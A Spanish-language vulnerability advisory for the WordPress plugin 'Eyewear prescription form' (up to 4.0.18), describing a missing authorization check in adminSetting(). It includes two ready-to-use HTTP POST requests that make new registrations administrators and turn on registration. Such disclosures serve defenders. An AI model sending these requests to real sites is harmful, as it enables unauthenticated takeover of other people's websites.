
Eyewear prescription form <= 4.0.18 - Autorización faltante para la actualización arbitraria de opciones sin autenticación
Eyewear prescription form <= 4.0.18 - Falta de autorización para la actualización no autenticada de opciones arbitrarias
El plugin Eyewear prescription form para WordPress es vulnerable a la modificación no autorizada de datos que puede conducir a una escalada de privilegios debido a la falta de una comprobación de capacidades en la función adminSetting() en todas las versiones hasta la 4.0.18 inclusive. Esto permite que atacantes no autenticados actualicen opciones arbitrarias en el sitio WordPress. Esto puede aprovecharse para actualizar el rol predeterminado de registro a administrador y habilitar el registro de usuarios para que los atacantes obtengan acceso administrativo a un sitio vulnerable.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
action=adminSetting&data[settingCode]=default_role&data[settingValue]=administrator
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
action=adminSetting&data[settingCode]=users_can_register&data[settingValue]=1